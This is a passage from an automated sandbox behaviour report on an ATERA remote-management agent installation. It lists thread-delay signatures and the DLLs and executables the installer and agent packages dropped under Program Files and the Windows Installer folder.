                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594668
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594531
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594165
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593843
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593719
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593451
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593334
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593206
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593077
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592959
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 592829
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 7200000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 7199859
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 3643
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 6065
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 6827
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 2698
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWindow / User API: threadDelayed 5252
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWindow / User API: threadDelayed 1821
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2668
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7087
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeWindow / User API: threadDelayed 5699
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeWindow / User API: threadDelayed 4098
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWindow / User API: threadDelayed 2106
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWindow / User API: threadDelayed 1080
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeWindow / User API: threadDelayed 8074
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeWindow / User API: threadDelayed 1683
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeWindow / User API: threadDelayed 7369
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeWindow / User API: threadDelayed 2294
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWindow / User API: threadDelayed 1779
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2FBD.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2D79.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Physical.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3FBB.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 692c4d.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICBAB.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Pubnub.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI56F2.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2FBD.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5085.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Debug.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9409.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5885.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.ConfigurationExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Diagnostics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI41D1.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5085.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.Extensions.ManagedClient.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dllJump to dropped file
